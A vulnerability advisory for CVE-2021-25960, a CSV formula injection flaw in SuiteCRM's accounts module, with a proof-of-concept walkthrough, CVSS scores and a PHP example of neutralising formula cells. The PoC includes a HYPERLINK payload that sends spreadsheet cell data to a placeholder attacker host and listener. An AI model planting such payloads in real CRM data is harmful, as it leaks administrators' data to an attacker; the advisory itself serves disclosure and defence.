
CVE-2021-25960

Date: September 29, 2021

Overview

SuiteCRM versions v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can use the accounts module to inject payloads into its input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload is executed. The fix for CVE-2020-15301 did not address this properly, allowing the attacker to bypass the security measure.

Details

The application “SuiteCRM” is affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged user (the attacker) can use the accounts module to inject payloads into the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload is executed.

PoC Details

For demonstration purposes we'll use 2 users:
1. Alice - low privileged user
2. Admin - administrator

Log in to the application as Alice and go to the accounts module. In the first name field, insert the CSV injection payload.
Start a listener on port 4444.
Then log in to the application as Admin and navigate to the accounts module. Select the fields and, under Bulk Action, click Export. A CSV file will be downloaded. Open it with Excel.
When Admin clicks on the first column that contains the payload, it gets executed and the data in cells A3 & B3 is sent to the listener at Alice's address.

PoC Code

==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")

Affected Environments

v7.11.18 - v7.11.19 and v7.10.29 - v7.10.31

Prevention

Upgrade to version v7.10.32, v7.11.21 or higher
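Besides upgrading, an export path can neutralise formula elements itself. The following PHP is an added example written for this advisory, not SuiteCRM's own export code or its actual fix; the naive "strip one leading '='" filter is assumed purely to illustrate why a strip-once approach is bypassed by the doubled trigger in the page's payload, and the listener address is the page's placeholder.

```php
<?php
// Added example, not SuiteCRM's own code: neutralising formula elements (CWE-1236)
// in CSV export cells so a spreadsheet treats attacker-supplied text as text.

// Characters that make a spreadsheet interpret a cell as a formula.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

// Naive filter, assumed here for illustration only (it is not a description of the
// original CVE-2020-15301 fix): drop one leading '='. A doubled trigger such as the
// page's "==HYPERLINK(...)" payload survives it with '=' still in first position.
function stripLeadingEquals(string $cell): string
{
    return ($cell !== '' && $cell[0] === '=') ? substr($cell, 1) : $cell;
}

// True if the raw cell value would be evaluated as a formula when opened.
function startsWithTrigger(string $cell): bool
{
    return $cell !== '' && in_array($cell[0], FORMULA_TRIGGERS, true);
}

// Robust neutralisation: prefix any cell whose first character is a trigger with a
// single quote so it is read as text. The cell is always double-quoted and embedded
// quotes are doubled, so commas, quotes or newlines in the value cannot break the row.
// Note: this also prefixes legitimate values such as "-5"; apply it to free-text
// fields, or accept the cosmetic change for numeric ones.
function neutralizeCsvCell(string $cell): string
{
    if (startsWithTrigger($cell)) {
        $cell = "'" . $cell;
    }
    return '"' . str_replace('"', '""', $cell) . '"';
}

// Builds one CSV row from already-escaped account fields.
function exportRow(array $fields): string
{
    return implode(',', array_map('neutralizeCsvCell', $fields)) . "\n";
}

// Constructed sample input: the page's payload with its placeholder listener address.
$payload = '==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")';

// The naive filter leaves a value that still begins with a formula trigger.
var_dump(startsWithTrigger(stripLeadingEquals($payload)));

// The neutralised row carries the payload as quoted text prefixed with a single quote.
echo exportRow(['Alice', $payload, 'alice@example.invalid']);
```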

Language: PHP

Good to know:

Improper Neutralization of Formula Elements in a CSV File (CWE-1236)

Upgrade Version

Upgrade to version v7.10.32, v7.11.21

CVSS v3 Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CVSS v2 Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial